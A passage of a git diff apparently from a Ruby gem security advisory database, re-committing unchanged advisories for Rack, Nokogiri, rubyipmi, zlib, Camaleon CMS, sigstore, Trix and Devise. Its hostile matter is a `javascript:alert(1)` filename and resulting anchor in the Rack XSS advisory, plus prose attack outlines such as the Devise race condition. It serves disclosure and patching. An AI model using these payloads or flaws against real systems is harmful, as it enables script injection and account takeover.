-    `Rack::Directory` generates an HTML directory index where each file entry is rendered as a clickable link. If a file exists on disk whose basename begins with the `javascript:` scheme (e.g. `javascript:alert(1)`), the generated index includes an anchor whose `href` attribute is exactly `javascript:alert(1)`. Clicking this entry executes arbitrary JavaScript in the context of the hosting application.
-
-    This results in a client-side XSS condition in directory listings generated by `Rack::Directory`.
-
-    ## Details
-
-    `Rack::Directory` renders directory entries using an HTML row template similar to:
-
-    ```html
-    <a href='%s'>%s</a>
-    ```
-
-    The `%s` placeholder is populated directly with the file’s basename. If the basename begins with `javascript:`, the resulting HTML contains an executable JavaScript URL:
-
-    ```html
-    <a href='javascript:alert(1)'>javascript:alert(1)</a>
-    ```
-
-    Because the value is inserted directly into the `href` attribute without scheme validation or normalization, browsers interpret it as a JavaScript URI. When a user clicks the link, the JavaScript executes in the origin of the Rack application.
-
-    ## Impact
-
-    If `Rack::Directory` is used to expose filesystem contents over HTTP, an attacker who can create or upload files within that directory may introduce a malicious filename beginning with `javascript:`.
-
-    When a user visits the directory listing and clicks the entry, arbitrary JavaScript executes in the application's origin. Exploitation requires user interaction (clicking the malicious entry).
-
-    ## Mitigation
-
-    * Update to a patched version of Rack in which `Rack::Directory` prefixes generated anchors with a relative path indicator (e.g. `./filename`).
-    * Avoid exposing user-controlled directories via `Rack::Directory`.
-    * Apply a strict Content Security Policy (CSP) to reduce impact of potential client-side execution issues.
-    * Where feasible, restrict or sanitize uploaded filenames to disallow dangerous URI scheme prefixes.
-  cvss_v3: 5.4
-  patched_versions:
-  - "~> 2.2.22"
-  - "~> 3.1.20"
-  - ">= 3.2.5"
-  related:
-    url:
-    - https://github.com/rack/rack/security/advisories/GHSA-whrj-4476-wvmp
-    - https://github.com/rack/rack/commit/f2f225f297b99fbee3d9f51255d41f601fc40aff
-    - https://github.com/advisories/GHSA-whrj-4476-wvmp
----
+---
+layout: advisory
+title: 'CVE-2026-25500 (rack): Stored XSS in Rack::Directory via javascript: filenames
+  rendered into anchor href'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2026-25500
+  ghsa: whrj-4476-wvmp
+  url: https://github.com/rack/rack/security/advisories/GHSA-whrj-4476-wvmp
+  title: 'Stored XSS in Rack::Directory via javascript: filenames rendered into anchor
+    href'
+  date: 2026-02-17
+  description: |-
+    ## Summary
+
+    `Rack::Directory` generates an HTML directory index where each file entry is rendered as a clickable link. If a file exists on disk whose basename begins with the `javascript:` scheme (e.g. `javascript:alert(1)`), the generated index includes an anchor whose `href` attribute is exactly `javascript:alert(1)`. Clicking this entry executes arbitrary JavaScript in the context of the hosting application.
+
+    This results in a client-side XSS condition in directory listings generated by `Rack::Directory`.
+
+    ## Details
+
+    `Rack::Directory` renders directory entries using an HTML row template similar to:
+
+    ```html
+    <a href='%s'>%s</a>
+    ```
+
+    The `%s` placeholder is populated directly with the file’s basename. If the basename begins with `javascript:`, the resulting HTML contains an executable JavaScript URL:
+
+    ```html
+    <a href='javascript:alert(1)'>javascript:alert(1)</a>
+    ```
+
+    Because the value is inserted directly into the `href` attribute without scheme validation or normalization, browsers interpret it as a JavaScript URI. When a user clicks the link, the JavaScript executes in the origin of the Rack application.
+
+    ## Impact
+
+    If `Rack::Directory` is used to expose filesystem contents over HTTP, an attacker who can create or upload files within that directory may introduce a malicious filename beginning with `javascript:`.
+
+    When a user visits the directory listing and clicks the entry, arbitrary JavaScript executes in the application's origin. Exploitation requires user interaction (clicking the malicious entry).
+
+    ## Mitigation
+
+    * Update to a patched version of Rack in which `Rack::Directory` prefixes generated anchors with a relative path indicator (e.g. `./filename`).
+    * Avoid exposing user-controlled directories via `Rack::Directory`.
+    * Apply a strict Content Security Policy (CSP) to reduce impact of potential client-side execution issues.
+    * Where feasible, restrict or sanitize uploaded filenames to disallow dangerous URI scheme prefixes.
+  cvss_v3: 5.4
+  patched_versions:
+  - "~> 2.2.22"
+  - "~> 3.1.20"
+  - ">= 3.2.5"
+  related:
+    url:
+    - https://github.com/rack/rack/security/advisories/GHSA-whrj-4476-wvmp
+    - https://github.com/rack/rack/commit/f2f225f297b99fbee3d9f51255d41f601fc40aff
+    - https://github.com/advisories/GHSA-whrj-4476-wvmp
+---
diff --git a/advisories/_posts/2026-02-18-GHSA-wx95-c6cv-8532.md b/advisories/_posts/2026-02-18-GHSA-wx95-c6cv-8532.md
index e5530891..9a9cfa79 100644
--- a/advisories/_posts/2026-02-18-GHSA-wx95-c6cv-8532.md
+++ b/advisories/_posts/2026-02-18-GHSA-wx95-c6cv-8532.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'GHSA-wx95-c6cv-8532 (nokogiri): Nokogiri does not check the return value from
-  xmlC14NExecute'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: wx95-c6cv-8532
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532
-  title: Nokogiri does not check the return value from xmlC14NExecute
-  date: 2026-02-18
-  description: |
-    ## Summary
-
-    Nokogiri's CRuby extension fails to check the return value from
-    `xmlC14NExecute` in the method `Nokogiri::XML::Document#canonicalize`
-    and `Nokogiri::XML::Node#canonicalize`. When canonicalization fails,
-    an empty string is returned instead of raising an exception. This
-    incorrect return value may allow downstream libraries to accept
-    invalid or incomplete canonicalized XML, which has been demonstrated
-    to enable signature validation bypass in SAML libraries.
-
-    JRuby is not affected, as the Java implementation correctly
-    raises `RuntimeError` on canonicalization failure.
-
-    ## Mitigation
-
-    Upgrade to Nokogiri `>= 1.19.1`.
-
-    ## Severity
-
-    The maintainers have assessed this as **Medium** severity. Nokogiri
-    itself is a parsing library without a clear security boundary
-    related to canonicalization, so the direct impact is that a method
-    returns incorrect data on invalid input. However, this behavior
-    was exploited in practice to bypass SAML signature validation
-    in downstream libraries (see References).
-
-    ## Credit
-
-    This vulnerability was responsibly reported by HackerOne
-    researcher `d4d`.
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 1.5.1"
-  patched_versions:
-  - ">= 1.19.1"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532
-    - https://github.com/advisories/GHSA-wx95-c6cv-8532
----
+---
+layout: advisory
+title: 'GHSA-wx95-c6cv-8532 (nokogiri): Nokogiri does not check the return value from
+  xmlC14NExecute'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: wx95-c6cv-8532
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532
+  title: Nokogiri does not check the return value from xmlC14NExecute
+  date: 2026-02-18
+  description: |
+    ## Summary
+
+    Nokogiri's CRuby extension fails to check the return value from
+    `xmlC14NExecute` in the method `Nokogiri::XML::Document#canonicalize`
+    and `Nokogiri::XML::Node#canonicalize`. When canonicalization fails,
+    an empty string is returned instead of raising an exception. This
+    incorrect return value may allow downstream libraries to accept
+    invalid or incomplete canonicalized XML, which has been demonstrated
+    to enable signature validation bypass in SAML libraries.
+
+    JRuby is not affected, as the Java implementation correctly
+    raises `RuntimeError` on canonicalization failure.
+
+    ## Mitigation
+
+    Upgrade to Nokogiri `>= 1.19.1`.
+
+    ## Severity
+
+    The maintainers have assessed this as **Medium** severity. Nokogiri
+    itself is a parsing library without a clear security boundary
+    related to canonicalization, so the direct impact is that a method
+    returns incorrect data on invalid input. However, this behavior
+    was exploited in practice to bypass SAML signature validation
+    in downstream libraries (see References).
+
+    ## Credit
+
+    This vulnerability was responsibly reported by HackerOne
+    researcher `d4d`.
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 1.5.1"
+  patched_versions:
+  - ">= 1.19.1"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532
+    - https://github.com/advisories/GHSA-wx95-c6cv-8532
+---
diff --git a/advisories/_posts/2026-02-27-CVE-2026-0980.md b/advisories/_posts/2026-02-27-CVE-2026-0980.md
index dd89e3b9..f47c83ed 100644
--- a/advisories/_posts/2026-02-27-CVE-2026-0980.md
+++ b/advisories/_posts/2026-02-27-CVE-2026-0980.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2026-0980 (rubyipmi): rubyipmi is vulnerable to OS Command Injection through
-  malicious usernames'
-comments: false
-categories:
-- rubyipmi
-advisory:
-  gem: rubyipmi
-  cve: 2026-0980
-  ghsa: hfcp-477w-3wjw
-  url: https://access.redhat.com/security/cve/CVE-2026-0980
-  title: rubyipmi is vulnerable to OS Command Injection through malicious usernames
-  date: 2026-02-27
-  description: |
-    A flaw was found in rubyipmi, a gem used in the Baseboard Management
-    Controller (BMC) component of Red Hat Satellite. An authenticated
-    attacker with host creation or update permissions could exploit this
-    vulnerability by crafting a malicious username for the BMC interface.
-    This could lead to remote code execution (RCE) on the system.
-  cvss_v3: 8.3
-  patched_versions:
-  - ">= 0.13.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-0980
-    - https://access.redhat.com/security/cve/CVE-2026-0980
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2429874
-    - https://github.com/logicminds/rubyipmi/commit/252503a7b4dca68388165883b0322024e344a215
-    - https://github.com/advisories/GHSA-hfcp-477w-3wjw
----
+---
+layout: advisory
+title: 'CVE-2026-0980 (rubyipmi): rubyipmi is vulnerable to OS Command Injection through
+  malicious usernames'
+comments: false
+categories:
+- rubyipmi
+advisory:
+  gem: rubyipmi
+  cve: 2026-0980
+  ghsa: hfcp-477w-3wjw
+  url: https://access.redhat.com/security/cve/CVE-2026-0980
+  title: rubyipmi is vulnerable to OS Command Injection through malicious usernames
+  date: 2026-02-27
+  description: |
+    A flaw was found in rubyipmi, a gem used in the Baseboard Management
+    Controller (BMC) component of Red Hat Satellite. An authenticated
+    attacker with host creation or update permissions could exploit this
+    vulnerability by crafting a malicious username for the BMC interface.
+    This could lead to remote code execution (RCE) on the system.
+  cvss_v3: 8.3
+  patched_versions:
+  - ">= 0.13.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0980
+    - https://access.redhat.com/security/cve/CVE-2026-0980
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2429874
+    - https://github.com/logicminds/rubyipmi/commit/252503a7b4dca68388165883b0322024e344a215
+    - https://github.com/advisories/GHSA-hfcp-477w-3wjw
+---
diff --git a/advisories/_posts/2026-03-05-CVE-2026-27820.md b/advisories/_posts/2026-03-05-CVE-2026-27820.md
index e2654854..a9e1de3e 100644
--- a/advisories/_posts/2026-03-05-CVE-2026-27820.md
+++ b/advisories/_posts/2026-03-05-CVE-2026-27820.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2026-27820 (zlib): Buffer overflow vulnerability in Zlib::GzipReader'
-comments: false
-categories:
-- zlib
-advisory:
-  gem: zlib
-  cve: 2026-27820
-  url: https://www.ruby-lang.org/en/news/2026/03/05/buffer-overflow-zlib-cve-2026-27820
-  title: Buffer overflow vulnerability in Zlib::GzipReader
-  date: 2026-03-05
-  description: |
-    A buffer overflow vulnerability exists in Zlib::GzipReader.
-    This vulnerability has been assigned the CVE identifier
-    CVE-2026-27820. We recommend upgrading the zlib gem.
-
-    ## Details
-
-    The zstream_buffer_ungets function prepends caller-provided bytes
-    ahead of previously produced output but fails to guarantee the
-    backing Ruby string has enough capacity before the memmove shifts
-    the existing data. This can lead to memory corruption when the
-    buffer length exceeds capacity.
-
-    ## Recommended action
-
-    We recommend to update the zlib gem to version 3.2.3 or later.
-    In order to ensure compatibility with bundled version in older
-    Ruby series, you may update as follows instead:
-
-    * For Ruby 3.2 users: Update to zlib 3.0.1
-    * For Ruby 3.3 users: Update to zlib 3.1.2
-    * You can use gem update zlib to update it. If you are using
-       bundler, please add gem "zlib", ">= 3.2.3" to your Gemfile.
-
-    ## Affected versions:
-
-    zlib gem 3.2.2 or lower
-
-    ## Credits
-
-    Thanks to calysteon for reporting this issue. Also thanks to
-    nobu for creating the patch.
-  patched_versions:
-  - "~> 3.0.1"
-  - "~> 3.1.2"
-  - ">= 3.2.3"
-  related:
-    url:
-    - https://www.ruby-lang.org/en/news/2026/03/05/buffer-overflow-zlib-cve-2026-27820
-    - https://rubygems.org/gems/zlib/versions/3.2.3
-    - https://rubygems.org/gems/zlib/versions/3.1.2
-    - https://rubygems.org/gems/zlib/versions/3.0.1
----
+---
+layout: advisory
+title: 'CVE-2026-27820 (zlib): Buffer overflow vulnerability in Zlib::GzipReader'
+comments: false
+categories:
+- zlib
+advisory:
+  gem: zlib
+  cve: 2026-27820
+  url: https://www.ruby-lang.org/en/news/2026/03/05/buffer-overflow-zlib-cve-2026-27820
+  title: Buffer overflow vulnerability in Zlib::GzipReader
+  date: 2026-03-05
+  description: |
+    A buffer overflow vulnerability exists in Zlib::GzipReader.
+    This vulnerability has been assigned the CVE identifier
+    CVE-2026-27820. We recommend upgrading the zlib gem.
+
+    ## Details
+
+    The zstream_buffer_ungets function prepends caller-provided bytes
+    ahead of previously produced output but fails to guarantee the
+    backing Ruby string has enough capacity before the memmove shifts
+    the existing data. This can lead to memory corruption when the
+    buffer length exceeds capacity.
+
+    ## Recommended action
+
+    We recommend to update the zlib gem to version 3.2.3 or later.
+    In order to ensure compatibility with bundled version in older
+    Ruby series, you may update as follows instead:
+
+    * For Ruby 3.2 users: Update to zlib 3.0.1
+    * For Ruby 3.3 users: Update to zlib 3.1.2
+    * You can use gem update zlib to update it. If you are using
+       bundler, please add gem "zlib", ">= 3.2.3" to your Gemfile.
+
+    ## Affected versions:
+
+    zlib gem 3.2.2 or lower
+
+    ## Credits
+
+    Thanks to calysteon for reporting this issue. Also thanks to
+    nobu for creating the patch.
+  patched_versions:
+  - "~> 3.0.1"
+  - "~> 3.1.2"
+  - ">= 3.2.3"
+  related:
+    url:
+    - https://www.ruby-lang.org/en/news/2026/03/05/buffer-overflow-zlib-cve-2026-27820
+    - https://rubygems.org/gems/zlib/versions/3.2.3
+    - https://rubygems.org/gems/zlib/versions/3.1.2
+    - https://rubygems.org/gems/zlib/versions/3.0.1
+---
diff --git a/advisories/_posts/2026-03-10-CVE-2026-1776.md b/advisories/_posts/2026-03-10-CVE-2026-1776.md
index d7c7719d..43b6f662 100644
--- a/advisories/_posts/2026-03-10-CVE-2026-1776.md
+++ b/advisories/_posts/2026-03-10-CVE-2026-1776.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2026-1776 (camaleon_cms): Camaleon CMS vulnerable to Path Traversal through
-  AWS S3 uploader implementation'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  cve: 2026-1776
-  ghsa: jw5g-f64p-6x78
-  url: https://nvd.nist.gov/vuln/detail/CVE-2026-1776
-  title: Camaleon CMS vulnerable to Path Traversal through AWS S3 uploader implementation
-  date: 2026-03-10
-  description: |
-    Camaleon CMS versions 2.4.5.0 through 2.9.1, prior to commit f54a77e,
-    contain a path traversal vulnerability in the AWS S3 uploader
-    implementation that allows authenticated users to read arbitrary
-    files from the web server’s filesystem. The issue occurs in the
-    download_private_file functionality when the application is
-    configured to use the CamaleonCmsAwsUploader backend. Unlike the
-    local uploader implementation, the AWS uploader does not validate
-    file paths with valid_folder_path?, allowing directory traversal
-    sequences to be supplied via the file parameter. As a result, any
-    authenticated user, including low-privileged registered users, can
-    access sensitive files such as /etc/passwd. This issue represents a
-    bypass of the incomplete fix for CVE-2024-46987 and affects
-    deployments using the AWS S3 storage backend.
-  cvss_v4: 6.0
-  unaffected_versions:
-  - "< 2.4.5.0"
-  notes: Never patched; last release was 2.9.1
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-1776
-    - https://github.com/owen2345/camaleon-cms/pull/1127
-    - https://github.com/owen2345/camaleon-cms/commit/f54a77e2a7be601215ea1b396038c589a0cab9af
-    - https://camaleon.website
-    - https://www.vulncheck.com/advisories/camaleon-cms-aws-uploader-authenticated-path-traversal-arbitrary-file-read
-    - https://github.com/advisories/GHSA-jw5g-f64p-6x78
----
+---
+layout: advisory
+title: 'CVE-2026-1776 (camaleon_cms): Camaleon CMS vulnerable to Path Traversal through
+  AWS S3 uploader implementation'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  cve: 2026-1776
+  ghsa: jw5g-f64p-6x78
+  url: https://nvd.nist.gov/vuln/detail/CVE-2026-1776
+  title: Camaleon CMS vulnerable to Path Traversal through AWS S3 uploader implementation
+  date: 2026-03-10
+  description: |
+    Camaleon CMS versions 2.4.5.0 through 2.9.1, prior to commit f54a77e,
+    contain a path traversal vulnerability in the AWS S3 uploader
+    implementation that allows authenticated users to read arbitrary
+    files from the web server’s filesystem. The issue occurs in the
+    download_private_file functionality when the application is
+    configured to use the CamaleonCmsAwsUploader backend. Unlike the
+    local uploader implementation, the AWS uploader does not validate
+    file paths with valid_folder_path?, allowing directory traversal
+    sequences to be supplied via the file parameter. As a result, any
+    authenticated user, including low-privileged registered users, can
+    access sensitive files such as /etc/passwd. This issue represents a
+    bypass of the incomplete fix for CVE-2024-46987 and affects
+    deployments using the AWS S3 storage backend.
+  cvss_v4: 6.0
+  unaffected_versions:
+  - "< 2.4.5.0"
+  notes: Never patched; last release was 2.9.1
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1776
+    - https://github.com/owen2345/camaleon-cms/pull/1127
+    - https://github.com/owen2345/camaleon-cms/commit/f54a77e2a7be601215ea1b396038c589a0cab9af
+    - https://camaleon.website
+    - https://www.vulncheck.com/advisories/camaleon-cms-aws-uploader-authenticated-path-traversal-arbitrary-file-read
+    - https://github.com/advisories/GHSA-jw5g-f64p-6x78
+---
diff --git a/advisories/_posts/2026-03-11-CVE-2026-31830.md b/advisories/_posts/2026-03-11-CVE-2026-31830.md
index c9ccb775..d1f344cb 100644
--- a/advisories/_posts/2026-03-11-CVE-2026-31830.md
+++ b/advisories/_posts/2026-03-11-CVE-2026-31830.md
@@ -1,64 +1,64 @@
----
-layout: advisory
-title: 'CVE-2026-31830 (sigstore): sigstore-ruby verifier returns success for DSSE
-  bundles with mismatched in-toto subject digest'
-comments: false
-categories:
-- sigstore
-advisory:
-  gem: sigstore
-  cve: 2026-31830
-  ghsa: mhg6-2q2v-9h2c
-  url: https://github.com/sigstore/sigstore-ruby/security/advisories/GHSA-mhg6-2q2v-9h2c
-  title: sigstore-ruby verifier returns success for DSSE bundles with mismatched in-toto
-    subject digest
-  date: 2026-03-11
-  description: |
-    ### Summary
-
-    `Sigstore::Verifier#verify` does not propagate the `VerificationFailure`
-    returned by `verify_in_toto` when the artifact digest does not match
-    the digest in the in-toto attestation subject. As a result, verification
-    of DSSE bundles containing in-toto statements returns `VerificationSuccess`
-    regardless of whether the artifact matches the attested subject.
-
-    ### Details
-
-    In `lib/sigstore/verifier.rb`, the verify method calls `verify_in_toto`
-    (line 176) without capturing or checking its return value:
-
-    `verify_in_toto(input, in_toto)`
-
-    When `verify_in_toto` detects a digest mismatch, it returns a
-    `VerificationFailure` object. Because the caller discards this
-    return value, execution unconditionally falls through to return
-    `VerificationSuccess`. This is the only verification sub-check in
-    the method (out of 12) whose failure is not propagated.
-
-    The message_signature code path is not affected.
-
-    ### Impact
-
-    An attacker who possesses a valid signed DSSE bundle containing an
-    in-toto attestation for artifact A can present it as a valid attestation
-    for a different artifact B. All other verification checks (DSSE envelope
-    signature, certificate chain, Rekor inclusion, SCTs, policy) pass because
-    they are independent of the artifact content. Only the in-toto subject
-    digest check detects the mismatch, and its result is discarded.
-
-    This allows an attacker to bypass artifact-to-attestation binding for
-    any consumer that relies on `Sigstore::Verifier#verify` to validate
-    DSSE/in-toto bundles.
-
-    ### Workarounds
-
-    None. Consumers cannot work around this without patching the library.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.2.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-31830
-    - https://github.com/sigstore/sigstore-ruby/security/advisories/GHSA-mhg6-2q2v-9h2c
-    - https://github.com/advisories/GHSA-mhg6-2q2v-9h2c
----
+---
+layout: advisory
+title: 'CVE-2026-31830 (sigstore): sigstore-ruby verifier returns success for DSSE
+  bundles with mismatched in-toto subject digest'
+comments: false
+categories:
+- sigstore
+advisory:
+  gem: sigstore
+  cve: 2026-31830
+  ghsa: mhg6-2q2v-9h2c
+  url: https://github.com/sigstore/sigstore-ruby/security/advisories/GHSA-mhg6-2q2v-9h2c
+  title: sigstore-ruby verifier returns success for DSSE bundles with mismatched in-toto
+    subject digest
+  date: 2026-03-11
+  description: |
+    ### Summary
+
+    `Sigstore::Verifier#verify` does not propagate the `VerificationFailure`
+    returned by `verify_in_toto` when the artifact digest does not match
+    the digest in the in-toto attestation subject. As a result, verification
+    of DSSE bundles containing in-toto statements returns `VerificationSuccess`
+    regardless of whether the artifact matches the attested subject.
+
+    ### Details
+
+    In `lib/sigstore/verifier.rb`, the verify method calls `verify_in_toto`
+    (line 176) without capturing or checking its return value:
+
+    `verify_in_toto(input, in_toto)`
+
+    When `verify_in_toto` detects a digest mismatch, it returns a
+    `VerificationFailure` object. Because the caller discards this
+    return value, execution unconditionally falls through to return
+    `VerificationSuccess`. This is the only verification sub-check in
+    the method (out of 12) whose failure is not propagated.
+
+    The message_signature code path is not affected.
+
+    ### Impact
+
+    An attacker who possesses a valid signed DSSE bundle containing an
+    in-toto attestation for artifact A can present it as a valid attestation
+    for a different artifact B. All other verification checks (DSSE envelope
+    signature, certificate chain, Rekor inclusion, SCTs, policy) pass because
+    they are independent of the artifact content. Only the in-toto subject
+    digest check detects the mismatch, and its result is discarded.
+
+    This allows an attacker to bypass artifact-to-attestation binding for
+    any consumer that relies on `Sigstore::Verifier#verify` to validate
+    DSSE/in-toto bundles.
+
+    ### Workarounds
+
+    None. Consumers cannot work around this without patching the library.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.2.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-31830
+    - https://github.com/sigstore/sigstore-ruby/security/advisories/GHSA-mhg6-2q2v-9h2c
+    - https://github.com/advisories/GHSA-mhg6-2q2v-9h2c
+---
diff --git a/advisories/_posts/2026-03-12-GHSA-qmpg-8xg6-ph5q.md b/advisories/_posts/2026-03-12-GHSA-qmpg-8xg6-ph5q.md
index 504a3b01..e19dc2bf 100644
--- a/advisories/_posts/2026-03-12-GHSA-qmpg-8xg6-ph5q.md
+++ b/advisories/_posts/2026-03-12-GHSA-qmpg-8xg6-ph5q.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'GHSA-qmpg-8xg6-ph5q (action_text-trix): Trix has a Stored XSS vulnerability
-  through serialized attributes'
-comments: false
-categories:
-- action_text-trix
-advisory:
-  gem: action_text-trix
-  ghsa: qmpg-8xg6-ph5q
-  url: https://github.com/basecamp/trix/security/advisories/GHSA-qmpg-8xg6-ph5q
-  title: Trix has a Stored XSS vulnerability through serialized attributes
-  date: 2026-03-12
-  description: |
-    ### Impact
-
-    The Trix editor, in versions prior to 2.1.17, is vulnerable to XSS
-    attacks when a `data-trix-serialized-attributes` attribute bypasses
-    the DOMPurify sanitizer.
-
-    An attacker could craft HTML containing a `data-trix-serialized-attributes`
-    attribute with a malicious payload that, when the content is rendered,
-    could execute arbitrary JavaScript code within the context of the user's
-    session, potentially leading to unauthorized actions being performed
-    or sensitive information being disclosed.
-
-    ### Patches
-
-    Update Recommendation: Users should upgrade to Trix editor
-    version 2.1.17 or later.
-
-    ### References
-
-    The XSS vulnerability was responsibly reported by Hackerone
-    researcher [newbiefromcoma](https://hackerone.com/newbiefromcoma).
-  cvss_v3: 4.6
-  patched_versions:
-  - ">= 2.1.17"
-  related:
-    url:
-    - https://github.com/basecamp/trix/security/advisories/GHSA-qmpg-8xg6-ph5q
-    - https://github.com/basecamp/trix/releases/tag/v2.1.17
-    - https://github.com/basecamp/trix/pull/1282
-    - https://github.com/basecamp/trix/commit/53197ab5a142e6b0b76127cb790726b274eaf1bc
-    - https://github.com/advisories/GHSA-qmpg-8xg6-ph5q
----
+---
+layout: advisory
+title: 'GHSA-qmpg-8xg6-ph5q (action_text-trix): Trix has a Stored XSS vulnerability
+  through serialized attributes'
+comments: false
+categories:
+- action_text-trix
+advisory:
+  gem: action_text-trix
+  ghsa: qmpg-8xg6-ph5q
+  url: https://github.com/basecamp/trix/security/advisories/GHSA-qmpg-8xg6-ph5q
+  title: Trix has a Stored XSS vulnerability through serialized attributes
+  date: 2026-03-12
+  description: |
+    ### Impact
+
+    The Trix editor, in versions prior to 2.1.17, is vulnerable to XSS
+    attacks when a `data-trix-serialized-attributes` attribute bypasses
+    the DOMPurify sanitizer.
+
+    An attacker could craft HTML containing a `data-trix-serialized-attributes`
+    attribute with a malicious payload that, when the content is rendered,
+    could execute arbitrary JavaScript code within the context of the user's
+    session, potentially leading to unauthorized actions being performed
+    or sensitive information being disclosed.
+
+    ### Patches
+
+    Update Recommendation: Users should upgrade to Trix editor
+    version 2.1.17 or later.
+
+    ### References
+
+    The XSS vulnerability was responsibly reported by Hackerone
+    researcher [newbiefromcoma](https://hackerone.com/newbiefromcoma).
+  cvss_v3: 4.6
+  patched_versions:
+  - ">= 2.1.17"
+  related:
+    url:
+    - https://github.com/basecamp/trix/security/advisories/GHSA-qmpg-8xg6-ph5q
+    - https://github.com/basecamp/trix/releases/tag/v2.1.17
+    - https://github.com/basecamp/trix/pull/1282
+    - https://github.com/basecamp/trix/commit/53197ab5a142e6b0b76127cb790726b274eaf1bc
+    - https://github.com/advisories/GHSA-qmpg-8xg6-ph5q
+---
diff --git a/advisories/_posts/2026-03-16-CVE-2026-32700.md b/advisories/_posts/2026-03-16-CVE-2026-32700.md
index c7a504c3..b21f164e 100644
--- a/advisories/_posts/2026-03-16-CVE-2026-32700.md
+++ b/advisories/_posts/2026-03-16-CVE-2026-32700.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2026-32700 (devise): Confirmable "change email" race condition permits
-  user to confirm email they have no access to'
-comments: false
-categories:
-- devise
-advisory:
-  gem: devise
-  cve: 2026-32700
-  ghsa: 57hq-95w6-v4fc
-  url: https://github.com/heartcombo/devise/security/advisories/GHSA-57hq-95w6-v4fc
-  title: Confirmable "change email" race condition permits user to confirm email they
-    have no access to
-  date: 2026-03-16
-  description: |
-    ## Impact
-
-    A race condition in Devise's Confirmable module allows an attacker
-    to confirm an email address they do not own. This affects any Devise
-    application using the reconfirmable option (the default when using
-    Confirmable with email changes).
-
-    By sending two concurrent email change requests, an attacker can
-    desynchronize the confirmation_token and unconfirmed_email fields.
-    The confirmation token is sent to an email the attacker controls,
-    but the unconfirmed_email in the database points to a victim's
-    email address. When the attacker uses the token, the victim's email
-    is confirmed on the attacker's account.
-
-    ## Patch
-
-    This is patched in Devise v5.0.3. Users should upgrade as soon as possible.
-
-    ## Workaround
-
-    Applications can override this specific method from Devise models
-    to force unconfirmed_email to be persisted when unchanged:
-    (assuming your model is User)
-
-    ```
-    class User < ApplicationRecord
-      protected
-
-      def postpone_email_change_until_confirmation_and_regenerate_confirmation_token
-        unconfirmed_email_will_change!
-        super
-      end
-    end
-    ```
-
-    Note: Mongoid does not seem to respect that will_change! should
-    force the attribute to be persisted, even if it did not really
-    change, so you might have to implement a workaround similar to
-    Devise by setting changed_attributes["unconfirmed_email"] = nil as well.
-  patched_versions:
-  - ">= 5.0.3"
-  related:
-    url:
-    - https://about.gitlab.com/releases/2023/01/09/security-release-gitlab-15-7-2-released
-    - https://github.com/heartcombo/devise/pull/5784
-    - https://github.com/heartcombo/devise/issues/5783
-    - https://portswigger.net/research/smashing-the-state-machine
-    - https://groups.google.com/g/heartcombo/c/ieiLJhG4EGE/m/PNlIQv54AAAJ
-    - https://groups.google.com/g/heartcombo/c/o9mtkcfvt_g/m/SABX6rp8AgAJ
-    - https://groups.google.com/g/heartcombo/c/XDII89RV6Ak/m/AJMOyayNAgAJ
-    - https://groups.google.com/g/heartcombo/c/TWge7vKELhc/m/gRTrgKz4CQAJ
-    - https://github.com/heartcombo/devise/security/advisories/GHSA-57hq-95w6-v4fc
----
+---
+layout: advisory
+title: 'CVE-2026-32700 (devise): Confirmable "change email" race condition permits
+  user to confirm email they have no access to'
+comments: false
+categories:
+- devise
+advisory:
+  gem: devise
+  cve: 2026-32700
+  ghsa: 57hq-95w6-v4fc
+  url: https://github.com/heartcombo/devise/security/advisories/GHSA-57hq-95w6-v4fc
+  title: Confirmable "change email" race condition permits user to confirm email they
+    have no access to
+  date: 2026-03-16
+  description: |
+    ## Impact
+
+    A race condition in Devise's Confirmable module allows an attacker
+    to confirm an email address they do not own. This affects any Devise
+    application using the reconfirmable option (the default when using
+    Confirmable with email changes).
+
+    By sending two concurrent email change requests, an attacker can
+    desynchronize the confirmation_token and unconfirmed_email fields.
+    The confirmation token is sent to an email the attacker controls,
+    but the unconfirmed_email in the database points to a victim's
+    email address. When the attacker uses the token, the victim's email
+    is confirmed on the attacker's account.
+
+    ## Patch
+
+    This is patched in Devise v5.0.3. Users should upgrade as soon as possible.
+
+    ## Workaround
+
+    Applications can override this specific method from Devise models
+    to force unconfirmed_email to be persisted when unchanged:
+    (assuming your model is User)
+
+    ```
+    class User < ApplicationRecord
+      protected
+
+      def postpone_email_change_until_confirmation_and_regenerate_confirmation_token
+        unconfirmed_email_will_change!
+        super
+      end
+    end
+    ```
+
+    Note: Mongoid does not seem to respect that will_change! should
+    force the attribute to be persisted, even if it did not really
+    change, so you might have to implement a workaround similar to
+    Devise by setting changed_attributes["unconfirmed_email"] = nil as well.
+  patched_versions:
+  - ">= 5.0.3"
+  related:
+    url:
